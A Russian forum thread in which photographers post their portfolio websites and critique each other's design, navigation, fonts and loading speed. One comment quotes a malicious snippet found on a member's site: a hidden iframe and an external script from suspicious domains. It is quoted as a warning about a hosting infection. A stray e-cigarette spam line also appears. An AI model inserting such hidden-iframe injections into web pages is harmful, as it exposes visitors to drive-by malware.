Trò chuyện

А давайте оценивать сайты друг друга (Update топика)

Раз уж портфолио оцениваем, давайте конструктивно оценивать сайты друг друга?Каковы правила хорошего сайта фотографа? 1. Удобный и минималистичный дизайн, не отвлекающий от фотографий
2. Простые и стильные шрифты (не более двух)
3. Классный запоминающийся лого
4. Поддержка мобильных и тач устройств (адаптивный дизайн)
5. Поддержка ретина экранов
6. Быстрая скорость загрузкиЧто-то еще?Ресурсы для вдохновения:
siteinspire.com
www.awwwards.comВНИМАНИЕ: сайты гофотовеб обсуждаются в соответствующей теме

Bình luận

В общем, кто первый на ковер? -))
www.pikulev.com
Мой. Только сильно не пинайте.
Tin nhắn do người chủ xóa
выключить музыку-ок,еще есть замечания?
Мрачноватый сайт, другая цветовая гамма нужна. И тени на шрифтах имхо не очень симпатично смотрятся.
Я тоже хочу, покритикуйте меня =)
Какраз собираюсь обновлять сайт полностью..
www.laceslice.com
клевый. по мотивам olgaboyko.com ? ))
я вообще впервые вижу такую фотографиню.. и сходства нет совсем на мой взгляд – абсолютно разные сайты.
скажите лучше, чего менять, чего не менять? =))
если бы не было превьюшек, можно сказать, что они на одном шаблоне сделаны.
мне очень нравится. единственно, надпись "Войти" можно заменить на "Смотреть"
Хорошо, спасибо =)
блин, пропустила, а сайт уже убит. интересно было бы глянуть
фигня в том, что у меня сайт не на шаблоне был сделан.
Что, совсем никак? :)
абсолютно. сайт должен соответствовать фотографиям
В ближайшее время буду избавляться от Флешь, на что обратить внимание при редизайне? Rostov-foto.ru
innadarda.com/Сайту всего 1,5 месяца!!! Совсем еще кроха :))
Буду рада критике!!!
И сайт и фото классные, не очень понравился шрифт только.
www.liliyagorlanova.ru
навеяло) особенно лого)
все фото долго грузятся, кнопки навигации в фоторазделах пришлось искать
www.photo-land.ruЧем подробней коммент, тем подробней будет ответный просмотр:)
Андрей, работы отличные но сайт не совсем современный и на 24 дюймовом мониторе смотрится мелковато и уж очень просто :(
Евгений, согласен. Он писался под среднее и низкое разрешение мониторов. Нужно обновить дизайн под новые размеры мониторов, и немного идеологию скорректировать
приятный. но опять же не везде посмотришь)
и мой www.smetaninolga.ru
ему еще и месяца нет. блог, пока еще пуст, но приму критику с радостью.
Коллеги, и это вы называете анализом сайта? Тема ни о чем
baliuk.comпока только свадьба, никак остальное не соберусь залить.
рад буду пару слов услишать...
Оцените сайт пожалйста www.medov-foto.ru Особенно скорость открытия фоток интересует...
Мой сайт:
www.pkorotkov.ru
Дизайн рисовал сам два года назад. В течение зимы обновлю контент.
Хотя есть мысли поменять все кординально... но это только в планах.
а это специально все съехавшее?
  • Ảnh 2
А в каком браузере смотрите?
У меня в сафари, опере и в ИЭ все по центру.
сафари 5.1.2
Мой Сайт Iva-Nov.ruОчень хочу знать мнение коллег)
ну ктонибудь гляньте)))
немного смущают облачка (субъективно, конечно), и то, что в галерее можно выбрать следующую картинку только по превью
вот мой сайт только недавно сделали по моему эскизу в компании gms по акции. obolonkova.com/
В общем все как я хотела, только он еще наполнен мало. пока только лавстори загружены. А свадьбы ни одной еще. Но это потому что мне не горит в этом сезоне, декрет. )
ekovaleva.ru
Мне тоже что-нибудь полезное скажите))
как не пыталась музыка не выключается, а у меня ребенок спит, неудобно.
Хм... странно.. там крестик есть все отключается...
сегодня отключается
а у меня вот такой сайт: www.knyazevfoto.ru
в апреле запустил – купил для него движок Имажевью и прикрутили мне к нему неск. текстовых страниц.
для тех у кого с флешем проблемы сайт переключается на html версию. не сильно удобную, но рабочую...
  • Ảnh 6
хз :(
я уже подзабыл про эту штуку, а она вылазит как раз если фото крупнее отображаются.
там выше в комментариях как раз масштаб снимков обсуждали – так вот только я включил чтоб они крупнее были и снова вылезла эта хрень. в коде ее нигде обнаружить не удалось
поправил :) в коде счетчика оказывается лишняя строка была)
интересны ваши мнения: totalphoto.com.ua
спасибо =)
Подача текстовки такая, неоднозначная. Но как я понимаю, это ваша фишка, которая раз еще не заменена, то видимо работает. а про говнофото клиенты не переспрашивают?
Вообще так уж получилось, что первым в глаза бросилась опечатка:
>> Стоимость и ответы на вопросы можн(а!) обсудить, связавшись с нами. Звоните!И не понял про свадьбы:
  • Ảnh 3
не переспрашивают))спасибо вам огромное, я сегодня кому-то дам пендаля за текст)))
из любопыства, наверное)) если в статистике сайта внутр. переходы посмотреть – наверняка раздел посещаемый окажется) мне вот интересно было узнать что за ним скрыто.
по статистике как раз наоборот))
а вообще странно, что в дисклеймер кто-то заходит. я вот не понимаю, зачем он нужен)
Www.nikphoto.ru мочите;))
www.jelov.ru
ищу, кто бы переделал галереи с флешь на хтмл
в info пробелом два слова не разбиты "За болееподробной"
ps/ в contact тоже с пробелом, отбивающим знаки препинания, косяки. и есть запятые лишние – внимательней перечитайте разделы :)
сижу в ресторане по wifi не хватило терпения дождаться когда все загрузится
это wi-fi ) обычно все норм, но все равно спасиб
Дизайн полностью придумывал сам, интересно Ваше мнение... www.portfolio.lg.ua
на тачпаде сложно с первого раза попасть в кнопку "увеличить", она не по всему полю активна у меня.
не нашла (или невозможно)) посмотреть маленькие или увеличенные картинки все подряд из раздела, без выбора по превью.
ну и тэги на главной слишком заметны)
filonova.ru велкам =)
а вот мой.www.tatianakot.ru/но хочу менять, уже почти поменяла-)) можно сказать.
надоел черный цвет.и времени нет,надо все свадьбы перезались,там все старое.
Интересно сделан сайт, жаль только что не очень хорошо грузится(
Снимаю, по сути, только с этой осени, так что строго не судите)
aa-photography.org.ua/
После перехода в свадебный раздел, деревянная текстура на фоне начинает отвлекать от содержания.
в остальном довольно приятный сайт.
Коллеги очень нужно ваше мнение
www.olegsamoilov.ru
Как раз задумался переделывать сайт и ваше советы придут очень очень в тему! спасибо
навигация справа отвлекает сильно, ее точно убирать, если переделывать
При заходе на сайт он сообщает что я уже подписан на "КАК УДАЧНО ПОЛУЧАТЬСЯ НА ФОТОГРАФИЯХ" . Это чего? :)
Чем отличается форма в "Предложения" от формы в "Контакты", не очень понятно, может лучше оставить одну?
Навигация справа как то перегружена...
Мелочь, но в правой панели "Связатья со мной вы можете по телефону: +7 (843) 267 50 50." – ошибка в орфографии.
"ГЛАВНАЯ | ФОТОГРАФИИ | КОНТАКТЫ | ГЛАВНАЯ СТРАНИЦА БЛОГА" – а почему не просто "блог"?А так в целом приятный сайт с хорошими фотографиями, но навигация и юзабилити такие же дурацкие, как и у меня :)
Думаю к весне полностью обновить сайт – дизайн, структуру и наполнение. Но для этого хотелось бы лучше понимать ошибки и недостатки старого, 2009 года выпуска.
В первую очередь – непонятки со структурой и навигацией по сайту.
Коллеги, посмотрите, а?
www.sunphoto.ru
при зщапуске вашего сайта у меня вылетает это окно:
  • Ảnh 11
а в оформлении непонятно зачем перо?ощущение что сайт поэтический
Прошу оценить мой! www.gold-p.ru
Делал сам, (тк напряг с финансами был) хоть и не программист ВООБЩЕ.....
На днях мне реанимировали, предварительно перелопатив, мой сайт. Оказывается, у меня такие мрачные фотографии!) особенно свадебные)) Раньше не обращала внимание, а тут как-то в глаза бросилось.
В общем, буду признательна, если кто-нибудь зайдет-посмотрит и пару слов черканет. Если уж что-то менять, то сейчвс, по горячим следам.Серии со свадеб пока не успела залить, а остальное все на месте.
денисфолов.рф мой второй сайт, ни все конечно нравится, но так в целом пойдет.
Не нравится то, как сайт преобразовывает фото, шарпинг на фотографиях и т.д., хотелось бы как на MyWed'e, загружаешь файл, то он в таком же качестве и показывает. Настраивал много чего, все ни как.
  • Ảnh 13
На днях закончил сайт Ирине. Думаю, она не против, если выложу) Требования: лаконичность, минимализм, чтобы ничего не отвлекало от фоток irarudneva.ru
Хочу переделать cfqn, выслушаю советы =) спасибо! www.ureg.ru
конечно переделывать!
наконец-то я переехал на ворпресс. при этом удалось реализовать фичи с предыдущего сайта: просмотр слайд-шоу в лайтбоксе. из нового – фото можно смотрет ь в двух режимах – обычно и во весь экран
  • Ảnh 14
  • Ảnh 15
  • Ảnh 16
Я чуток свой поправил:
www.radosvet.ruБлог пока на старом дизайне. Хотя отличий не так и много.
Кто посоветует движок галереи на основе javascript jquery ?
в гугле набираешь галерея jquery – очень много вариантов будет)
Да что-то какой-то отстой в основном... загрузчики неудобные :(
это понятно. тебе для какого-то определенного движка?
Нет, для статичного сайта... у меня сейчас на флеше, хочу примерно такую, но без флеша, но чтобы была удобная админка и загрузка + сортировка и тд :)
такие галереи обычно идут как плагин к какому-нить движку. например вот эти две галереи
yarovikov.ru/?page_id=2…
irarudneva.ru/?page_id=…
это два разных плагина. можно фотки сразу кучей загружать, сортировать и тп
Ну вот тоже думаю сайт перевести полностью на движок.
Отталкивает то, что сайт может заглючить, если будут проблемы с БД или какой-то нагрузкой на сервер.
Статические страницы в этом плане надёжнее, да и взломать сложнее.Спасибо, буду думать, WP нравится.
так и есть. хостеры не любят WP, типа нагружает сильно))
www.k-steinberg.ru
Буквально сегодня доделали основную часть сайта. Портфолио загрузила на скорую руку. Очень хочется мнений по существу, что можно добавить, что убрать и что, может быть, сделать иначе :-)
а о нашем сайте, что думаете? 2hearts-photo.com
ну зашла слева лого справа фотки сами перелистываются,вроде стильно, фото хороши,но что дальше то делать.на что нажимать чтоб узнать контакты и прочую инфу?
ааа ну вот внизу минюшка, честно сразу не заметила
лучше бы все же сверху меню!..теперь все нравится!
спасибо, мы это учтем) потому как действительно не все сразу это меню находят
photoamplua.comНаш сайт. Делали два года назад, недавно обновили контент. По статисте не так уж и много посетителей заходят с планшетов, поэтому менять не собираемся ничего, кроме логотипа и стрелок просмотрщика.
вот сайтик .кто что скажетmaxim-kondratiev.com/
в принципе, прикольно. ток желтый цвет не в каску и фотки маленькие
Собрался занятся редизайном и модернизацией своего сайта. Хотелось бы услышать мнение знающего человека.
Все! Вроде как закончил окончательную версию. yarovikov.ru
В разделе Контакты проверь путь для ссылки ВКонтакт:
сейчас ведёт сюда: yarovikov.ru/vk.com/ale…
Хорошо сделано! Галерея удобная, но вот когда открывается фото на весь экран, это окно меняется в зависимости от вертикального и горизонтального, листать неудобно... Мне вот не нравятся эти лайтбоксы.
А так, в стандартном режиме очень удобно, ничего лишнего :)
А там вертикальных почти нет) зато во весь экран )
Еще в разработке, но буду благодарна комментариям, так как делаем сами, уже не вижу многого .
www.photoset.by/
к слову о выравнивании элементов на сайте. сначала делается макет
  • Ảnh 19
можно наш с мужем тоже оценить?
kate-max.ru/
Навигация перемудрёная. Всё куда-то прячется, уезжает. И при этом работает слайдшоу. Создаётся впечатление что сай живёт своей жизнью а посетитель тут ваще не главный. Без обид. ИМХО
Ну что же, Мочите и меня!
www.lephotographe.ru
Подделал сайт. Теперь видео с раздела Слайд-шоу читается на любом устройстве, включая айфоны с айпадами.ни у кого видео не тормозит?
  • Ảnh 23
страничка с ссылками
Сайт визитка! Демонстрация моего портфолио! Все что нужно, чтобы понять, как я работаю! Зашел – понравилось – заказал!
Вот мой сайт www.neovision-studio.ru…
Реально важны ваши мнения!
Фотографии не оценивайте – они старые)))) Давно не меняла... Руки не доходили. Собираюсь к маю обновить портфолио.
На мой взгляд главная страница перегружена текстом и не очень удбная навигация.
Чего-то никто меня не мочит :( А хотелось бы услышать мнения...
www.lephotographe.ru
Лично мне не нравятся "черные" сайты. И гифка на кнопке "стоимость" уж больно навязчива)))
очень-очень мрачный сайт!Вы же свадьбы снимаете, а не похороны
Мне тоже было бы интересно узнать Ваше мнение www.evgeniyaglyanec.com…
а почему что-то на английском, а что-то на русском?
Вы о названиях разделов и о названиях папок?
спасибо, задумаюсь
Вот... www.kisfoto.com
Жду конструктивной критики ;)
www.artstyle.asia
Большую часть работы по сайту делал сам :)
Странно читать биографию на личном сайте фотографа от 3го лица. Не все захотят что-то скачивать, чтоб посмотреть слайлдшоу и тп
Буду рад гостям www.art-nat.ru
Интересуют любые мнения, тк сайт еще в процессе строительства...Но основное функционирует. спасибо!
вот после этого "Я, Артём Булкин, приветствую Вас на моём сайте!" не смог дальше адекватно воспринимать информацию..
А что не так? Надо же как-то представится...
Конечно можно написать в духе "Здравствуйте, мое имя Булкин Артём". Я свадебный фотограф..." Но, кмк, уныло это...
igortsaplin.ru/
и я в общую кучу за пинками))
на ipad меню "портфолио" не работает
а посмотрите мой, как раз сейчас его тестирую
konstantineremeev.com/пока выяснилось что на мобильных девайсах верстка слетает, надо доделать, но может еще что найдется?
в целом – неплохо.
- анимация меню лишняя
думаешь?
может просто поменьше увеличение сделать?
имею ввиду вверхнее меню – выезжающий текст
ну хз
мне нравится )
Как интересно! А можно я тоже покажу? мне, если честно мой сайт не очень нравится, но пока незнаю что поправить(...В общем, вот kushfoto.ru/
Алекс, вновь мы встретились) Только теперь не за "футбольным полем с пивом" в "Бермудах" :)Вот мой сайт:www.dmitrybelkin.ru/
не люблю такой просмотр с автоматическим прокручиванием. самый худший вариант на мой взгляд
и я рискну, правда он у нас оч и оч простой))) www.botvinovskaya.com
приятный! оставляет положительные впечатления
это главное! благодарю =)
Сегодня закончил почти неочередной сайт для визажиста. Красота :)
  • Ảnh 25
  • Ảnh 26
  • Ảnh 27
  • Ảnh 28
отличный. а что за плагин для фоток в галерее?)кстати, у вас же есть логотип (на визитках). почему на сайте отсутствует?)
Ну на тот момент, когда делали сайт, был ещё старый логотип и его не хотелось использовать на сайте =)
Про плагины. Все на стандартном WP =)
www.free-writer.ru/
На самом деле сейчас озадачилась дизайном – на своём сайте, вдохновляемым идеей, мне почему-то трудно разобраться с этим.
больше похоже на сайт газеты
  • Ảnh 31
во. оцените готовый sgrosheva.com . я им весьма доволен
Как много букв! Отталкивает сразу же.
Сообщение выше to Сергей Витрук. Не обновила страничку перед отправкой)))
интересно как оценят мой. www.mashalaeva.com
Магазин электронных сигарет: электронная сигарета купить в томске, электронная сигарета 502, сигарета электронная точки продаж, электронная сигарета ego joe отзывы, электронные сигареты в нижневартовске.зачем делать на флэше то, что можно сделать без него?
И мне расскажите что как) Буду признательна)
www.ivanova-olga.ru
если провести аналогию с дизайном фотокниг, то ассоциация вот такая images04.olx.ru/ui/9/78…
подробнее можно? почему так?
я не знаю, почему у вас плохой дизайн сайта) хотя знаю – бесплатный же
не, ну бросить какашку проще простого, а пояснить более конкретно мы же не можем)))
если бесплатный, значит сразу все плохо)) гениально)
вот посмотрите minimalexhibit.com/cate… , и сравните )
Алекс, странный вы человек) я разве попросила накидать мне ссылок?) я просила конструктивной критики)
От вас этого не увидела) поэтому благодарю за внимание)
если бы были мелкие недочеты, я бы написал. а так проще переделать. н оесли вы не видите разницы, то, наверно, не надо)))
Алекс, я прекрасно понимаю о чем вы говорите. И есессно как будет возможность, я сделаю себе нормальный качественный сайт. Да, этот бесплатный! Да, его сделали как проще, а не как я хотела бы! Но после того доисторического колхоза, который был до этого, меня пока что устраивает) жаль, что на вас он произвел такое печальное впечатление) в любом случае, спасибо за мнение)
если можно оцените, и самое главное покритикуйте мой сайт vasilchenkosergey.com/
Пожалуйста, критикуйте)) – lovearoundus.com
Будем рады отзывам коллег! Больше всего интересует эмоциональный отклик и удобство..
Тоже неплохая темка :) и ее попиарим webdesignledger.com/new…
из-за вируса предыдущий сайт пришлось снести (тут даже тему кто то заводил)
потестите новый что ли =) filonova.ru
он в стадии заполнения пока
стандартная шкурка. мой вот тоже на wordpress, но мало кто догадается
мы тестим пока, может изменим что то
Очень жаль, что умерла такая полезная тема, а мне как раз очень нужны мнения, только что доделала страничку. Но вдруг кто-нибудь зайдет:)yuliyabahr.com
показалась низковата картинка для слайд-шоу а так все приятно.Лучше уменьшить немного логотип и внизу какой то фотоаппаратик зачем он вообще? отвлекаешься от просмотра фото, смотришь то на большой логотип то на фотку то на фотоаппаратик, толком фотки не разссматриваешь
Спасибо большое, Артем! Лого сегодня уменьшу, фотоаппаратик мне нравится пока:) может быть потом поменяю свое мнение
Пожалуйста, Юлия) Мне фотоаппаратик тоже нравится) просто сконцентрировать внимание нужно на фото) Они очень приятные.
Делал ещё года 4 назад)
www.Slava-Grebenkin.ru – на флеше
сайт может и эффектно смотрится, но сейчас уже немного не в теме. Довольно долго грузится, навигации нормальной нет.Непонятно ничего и поэтому уходишь с него.Хочется поскорее отсюда уйти.
Артём спасибо, по сайтам взаимно ;-)
Слава, вы не обижайтесь, фотки мне понравились и довольно все эффектно и музыка понравилась, только психологически когда я не понимаю что как и не могу повлиять не на что то хочется закрыть, получается я как бы не учавствую в процессе, не могу посмотреть что мне интересно, меня немного сковывают.Создается психологический дискомфорт. А так все в принципе довольно стильно и симпатично)
Спасибо, будем учитывать =) Хотел минимизировать что бы наоборот не напрягать клиента что-то нажать))
Согласен с предыдущими коментами, с моим быстрым интернетом я ждал когда подгрузится сек.20 в современном обществе это не допустимо ;)
bearman.com.ua/
мой)
сам медведь с садика ) когдато рисовал комиксы с мишками , ну и сайт решил в том же русле оставить))) правда с наполнением беда, руки не доходят, сайт сделал год назад, а наполнить фотками нормально забыл)
очень необычно выглядит сайт, интересно
+1 классно) беремчатые)
пасип) мне самому нравитсмя, вот только лень моя меня подводит)) надо бы таки заняться наполнением))
ну раз зашёл,то и свой выложу www.alexeysafonov.com
Алексей ,ваш сайт понравился, с блогом. Это на ворд пресс? Сами делали?
ОТличный сайт, ничего лишнего и ничего не отвлекает :)
спасибо Артём. Ворд пресс + pro photo.com + сам доделывал
Вот мой сайтик, буду рад комментариям!) www.artemlaskov.com
www.mexphoto.lv
blog.mexphoto.lvИнтересно мнение других
Сайт приятный, легко все грузится и открывается, интуитивно понятно, логотип на пол странички кажется перебором) так же почистил бы портфолио портретов. Плагин с лайками в хроме у меня не работал, понравилось как фотки грузятся быстро. движок сайта шустрый, оптимизация хорошая, только я на ноуте сижу, когда вертикальная портретная фотка не влазит полностью я скролю мышкой а курсор на фото в галерее и происходит переключение быстро между фото, немного не удобна навигация или не привычна. А так сайт необычный и отсавляет позитивные впечатления)
да, давно не обновлял портреты как таковые :) хотя их много накопилось уже, и свадьбы надо немного обновить еще, а так спасибо за мнение, в принципе этого и добивался, простоты и понятности, а то когда заходишь к некоторым поглядеть фоты, голову ломаешь как что делать :)
mestosveta.ru/Интересно услышать замечания, предложения. Буду очень благодарен.
дизайн норм, вроде понятно все.кнопки нормальные, только когда нажимаешь портфолио происходит странное, открывается свадебная галерея опять и ниже лав стори студия и еще что то, а где свадьбы отдельно? Причем у меня ноутбук, я раза с третьего понял что надо ниже спуститься и там разбивка по категориям галерей. Не очень понятно. разбивки по свадьбам нет? только ассорти?Не есть хорошо.Сам от этого ушел.
Спасибо, Артем. Все поправлю
Александр, " HI, MY NAME IS ALEXANDER VASILEV. I JUST LOVE WEDDING PHOTOGRAPHY AND BELIEVE IT'S NOT JUST MY GREATEST PASSION, BUT SOMETHING THAT HAS CHANGED MY WHOLE LIFE!" Это так задумано? я пока прочитал, поламал мозг ;) Сделайте всё на русском и дубль на английском смотрелось бы как то равномерно а то сумбур какой то :) имхо :) и ещё убрал бы социконки на каждой фотографии в галерее, отвлекают они внимание :)
Спасибо за рецензию ) Иконки у меня убрать знаний не хватит, а формат текста такой намеренно.
Был бы признателен ;) Может что то поменять, добавить, переделать? zavgorodniy.com/
Очень хочу услышать отзывы по нашему сайту!
Заранее спасибо :)
luxuryphoto.com.ua/
Алексей, всё понравилось, вроде ничего не отвлекает от главного :) Конечно на большом мониторе немного смотрится мешковато первая страница но думаю это не существенно!
elizavlasenko.com/ тоже Julia) сильно ничего не меняла
я бы сделал один и такой же шрифт, он у вас разный в разделе "отзывы" и "обо мне" :) т убрал бы иконки с каждой фотографией которые высвечиваються, это мне так кажется лишнее и отвлекает только внимание от КЛЁВЫХ фоточек :)
спасибо!)про шрифт не заметила даже)а что за иконки?у меня при наведении курсора не высвечиваются,только если правую кнопку мыши нажать
когда в галерее просматриваеш по отдельности фотографии тогда внизу каждой фотографии высвечиваються две иконуи фейсбук и вконткте, вот и менно их их глалерееи убрать а то отвлекают :)
Недавно запустили и наш сайт: idea-pix.com/
Как вам? Очень интересно узнать ваши впечатления)
Впечатления только положительные :) Отличный сайт и фото!
отличный и сайт!! и снимки вах!!!
Два моих :)yarovikov.ru – портфолио
mr-and-mrs.ru – свадебный блог
  • Ảnh 38
  • Ảnh 39
Просто замечательно, ничего лишнего и ни что не отвлекает от главного!!!
очень понравился)) почти идеален!
о, наконец сделали мой.
посмотрите, пожалуйста.
я им довольна невероятно и делали с очень приятной командой, ребята как будто чувствовали, что я хочу=)
kkorolyova.ru
Выглядит приятно и просто.
Хороший. Нравится всё, кроме отсутствия адаптации под ретину и просмотра картинок
И мой оцените пожалуйста:)
недавно поменяли интерфейс: bars-studio.com.ua/
фотки круглые искажены по пропорциямв целом норм, но как-то разваливается дизайн
хахаха, да искажаются)
не хватает кнопки "назад"при просмотре длинных серий.
Друзья, а как вы считаете на сайте надо делать страничку отзывов? Она полезна клиенту?
а может просто ссылку на сайт ведмен?) у нас были отзывы... их толком никто не читал, смотрели наличие))
простой сайтик, правда я им еще не занимался, плохо, знаю, но обещаю исправиться:)))
мне инетресно, что стоит добавить?
slastushenski.ru
Очень критики хочу, буду весьма признателен! vasilchenkosergey.com/ можно даже в личку писать что не так с сайтом или предложения )))
и мой оцените, пожалуйста, кому не трудно
www.gureeva.com
Ребята, вы зайдите, оцените, отпишите парочку сайтов сами а потом здесь выставляйте!
И еще 100500 одинаковых сайтов на гофотовеб нет смысла показывать, если они отличаются только логотипом. Оцениваем нешаблонные сайты
разнесите меня,пожалуйста,в пух и прах.Также всех с наступающим!www.fotografie-in-kasse…
что за ужасная фотка в шапке сайта, она отпугивает :( не удачная на вой взгляд, по крайней мере не для шапки сайта. дда и галерея слабенькая :)
спасибо Женя, в шапке моё любимое фото.Незнала, что оно плохое. .А что значит "галерея слаба"? Сама галерея или фото в ней?
Виктор, сайт визуально ок, но вот смотри, слайд шоу, фотографии летают, в итоге происходит кадрирование, кадру улетают прилетают, и если объект не находится по центру, то всё кадра не увидеть ничего не понять он обрезается нещадно. Также разрешение фоток на это слайд шоу меньше чем надо для нормального моника, от этого страдает качество фоток когда они приближаются, и так ничего не понять, так еще и качество становится плохим.После, нажал на портфолио, и меня кинуло на пустую страницу, оказывается надо зайти в вылетающем меню в определенную категорию, мелочь а в ступор ставит. Ну и в контактах не плохо былобы добавить вашу фотографию, обычно люди хотят видеть кого они будут заказывать ;)
Спасибо !
Да согласен, есть некие недоделки по скрипту, учту :)
ой ой ой, вот анимация-то дикая))
давно не наполнял, но не суть..
Мой – alekseysmirnov.ru
жены – vera-smirnova.ru
Видимо сайты у меня и жены опупительные, раз так одиноко стою в сторонке :)
алексей, не то чтоб апупительны, но действительно хороши, комментировать нечего :) нет слабых сторон ;) так что сайтик спокойно может жить года 2-3 :) главное галерею обновлять :)
Про ваш сайт. Полистала свадьбы, заглянула в портфолио тут – как два разных человека снимали... Давно не обновляли?
я тут прошёлся по всем сайтам, на которых регистрировался с 2010г.
долго чистил "улики" и компромат)))
всмысле? не понял, о_О
да старьё своё вычищал))) а то нарегися, в своё время, на десятке свадебных порталов, а портфолио так ни разу не обновлял.
если чесно, давно хочу все переделать на другом движке ( koken.me ) даже тестовый домен сделал dev.liveversion.ru , но останавливает SEO, на WP легко, поставил плагин и все пучком, но сайт тяжелый получается.
А в чем проблема по СЕО в кокен?
фиг знает, мне кажется, как то не очень оно там работает.
Да оно и сейчас на вашем текущем не работает)
Потому что для поискових в первую очередь важна семантическая верстка и наличие большого количество текста на главной и другой страницах (то, что вы забиваете в админке – ключевые слова и тп это важно, но работает только при наличии этих слов в контенте страницы)
Эвоно как. Ушел изучать семантическую верстку. (открыл гугл, оказалось интересно :)
По-этому блоги так хорошо индексируются?
Блоги хорошо индексируются из-за большого количества текстового контента
Тоесть смысла от All In One SEO Pack нет вообще никакого?
Без текста на странице почти никакого. Поисковики все учитывают и могут даже в черный список внести
посмотрел код вашего сайта, интересная тема.
код моего сайта не лучший пример для подражания) сейчас переделываю чутка
я про тему используемую, название и все такое :)
посидел немного, подопиливал кокен.
что скажете?
dev.liveversion.ru – тестовый домен.
nikolay-kireyev.com/
все ни как до ума не доведу=))
m-foto.by/посмотрите мой, покритикуйте
anastasia-strelcova.ru/… – подскажите если, что не так, буду очень признательна))))
А мне понравилось :) и ничего лишнего
вот как свой оформил от gophotoweb
www.andreyvorobyev.ru
Ребят, посмотрите пожалуйста новороженный сайт sv-kolesova.ru/. Что убрать-добавить? Все ли корректно отображается?
У вас очень оригинальный сайт. Такого логотипа и зеленого цвета нет больше ни на одном сайте гофотовеб)
Алекс, это сарказм?) Да, собственного логотипа нет пока... выбирала из предложенных шрифтов. А цвет... честно говоря, не проводила исследования по использованию зеленого цвета. Просто он мне нравится. Говорят, на зеленом глаз отдыхает.
Это сарказм, да. Ваш сайт точно такой же, как и сотни других. Что тут обсуждать? В отдельной теме уже все осбудили))
Ну тогда приношу глубочайшие извинения, что мой не оригинальный сайт отнял у вас пару минут вашего драгоценного времени. Вы тогда в теме сразу напишите, что товарищам с сайтами "как сотни других" тут делать нечего, т.к их уже обсудили в другой теме... Да, и поделитесь пожалуйста ссылочкой на другую тему.
В теме это написано чуть выше. А обсуждение сайтов гофотовеб в теме про сайты гофотовеб
чуть выше... ага, смешно... в теме больше тысячи сообщений... как же я могла пропустить самое главное?
В которой именно теме? я их все просмотрела, но вот не нашла как-то где "все обсудили". Посмотрите внимательно, я ведь не просила оценивать дизайн. Я не могу посмотреть сайт с тех девайсов, которых у меня нет... Попросила помощи у людей. А вы как-то очень злобно меня отсюда изгоняете.
наверное также думают невесты, выбирающие зелёные свадебные платья
Светлана мне очень понравился Ваш сайт, удобный и я бы сказала нежный, воздушный)))))
Спасибо, Анастасия.
РЕБЯТА, прикладывайте скрин к ссылке, чтобы заметнее было. А то многие сообщения не замечаются.
а посмотрите мой,простенький))
www.markovkina.ru
циферка "1" на главной в левом верхнем углу, так и задумано?
  • Ảnh 53
не замечала!!! спасибо)
похоже вредноносный скрипт в начале страници
<iframe src="fuckav.usa.cc" width="0" height="0" style="visibility: hidden"></iframe><script type="text/javascript" src="jmobi.net/js?id=3902&qu… src="fuckav.usa.cc" width="0" height="0" style="visibility: hidden"></iframe><script type="text/javascript" src="jmobi.net/js?id=3902&qu…
  • Ảnh 54
у нас на хостинге вирус(((
все заработало))))
странно, но меня аваст не пустил на ваш сайт
ivash.com.ua Будет очень важно мнение)
Спасибо, но хотелось именно критики.
Критики? :) паркетный пол поменяйте, вы ведь фотографию продаёте а не линолеум ;)
Люю-у-у-ди, скажите что-нибудь)) Пожалуйста.
Какже сложно было мне найти галерею, когда нашел, оказывается нужно еще нажать на папку, и тогда попадаю в альбом. Сделайте лучше всплывающее меню и первым в этом списке в любой категории должна быть галерея.
  • Ảnh 56
это мой первый сайт, заполнила 3 дня назад, посоветуйте, пожалуйста, что хорошо, что плохо, спасибо. udyanskaya.com/
я не профи, но мне очень понравилось как фотографии всплывают
не обычно, долго искала кнопки меню, потом увидела, что они внизу
А что про мой скажете?
stepan-tretyakov.com
все хорошо, только позвонить некуда ;)
У меня совсем простенько, но хотелось бы услышать мнение)
chagov.ru/
офтоп: завис рассматривая карточки...
не оч понятно.... это же хорошо, что зависли)
Добрый день, отличная тема! Будет очень интересно услышать Ваше мнение, что необходимо поменять или доработать на моем сайте www.milshin.ru ,спасибо большое и всем лучи радости!
Оцените пожалуйста мой то же...
www.rogovtsov.pro
что никому прям не понравилось?
да, они молодцы!
Оцените пожалуйста и мой...
petrpetrovskiy.com
Да все ОК, только блог пустует и много "рыжих" фотографий разной стилистики на мой взгляд. Еще цветные квадратики внизу без обозначений поналалу кажутся странными.
Я бы убрал отображение названия файлов, не приколькно смотрятся, EXIF тоже бы убрал, но это уже менне существенно.
solodfoto.ru Я все сделал в черных тонах.... поругайте и мой тоже!
Новая тема для wp в стиле pinterest. Ультраминимализм и стиль)
  • Ảnh 58
А вот видео, ка она работает instagram.com/p/ke946aI…
Нравится! Лаконично и стильно.
Мой: www.taurusphoto.com
Критика приветствуется :)
Обновил дизайн, зацените очень важно мнение =))
сайт сам от гоуфотовэб
nikolay-kireyev.com/
  • Ảnh 59
чб на этом фоне ну совсем блекленько, не контрастно, перебор, имхо.
Вот в этом то и вопрос =))
Но в портфолио и в блоге там уже в цвете=))
Интересны мнения)
asyabelova.com/
не влез в окно моего браузера :)
  • Ảnh 60
Ниче се! Я была уверена, что тестила во всех браузерах(
не заморачивайтесь, то был стеб, не все юзеры раскрывают окно браузера на полный экран, в основном это виндовая привычка, посидев на макоси понимаешь как оптимизировать пространство на рабочем столе :)
я удивлюсь пользователю сидящему на 27-30" монике с раскрытым на полный экран браузером :)
вот например, это на 17"
зачем мне столько свободного пространства слева и справа от контента?
  • Ảnh 61
Так и есть
Вот недавно обновил свой
www.alexeyusovich.com/
  • Ảnh 63
а мы тут от гофотовеб не обсуждаем))
ты тут только свои сайты пиаришь:)
Я хочу обсуждения своего сайта
у тебя стандарно все)) как у всех, попса))
Привет с Болгарии, подкритикуйте пожалуйста:
deliysky.com/bg/home.ht…
вот сайт не мой но земляка так сказать.
charmestudio.org.ua/
мой доделанный. еще будут доработки в плане шрифтов и по мелочам, но в целом все так)
  • Ảnh 64
www.ktolubit.com
старался сделать максимально простым и удобным для просмотра большого количества фотографий)
  • Ảnh 66
очень приятный. Ничего лишнего
alisheihphoto.ru очень интересно услышать мнение , сайт делал сам , код писал полностью сам вручную!!!!
версия 3.0
www.churnosoff.com/
делал сам, и еще в процессе
открыт для конструктивной критики
  • Ảnh 67
Клевый сайт, нравится. Управление картинками стандартное от wp? Если нет, покажи скрин)
вот, все очень легко и быстро
  • Ảnh 72
  • Ảnh 68
Сайт в тестовом состоянии, очень нужна критика по общему виду и компоновке, буду благодарна мнениям : fotola.ru/d/index.html
Как называется галерея как на Майведе ??
Что бы фоточки можно было колесиком проматывать ??
вертикальная?
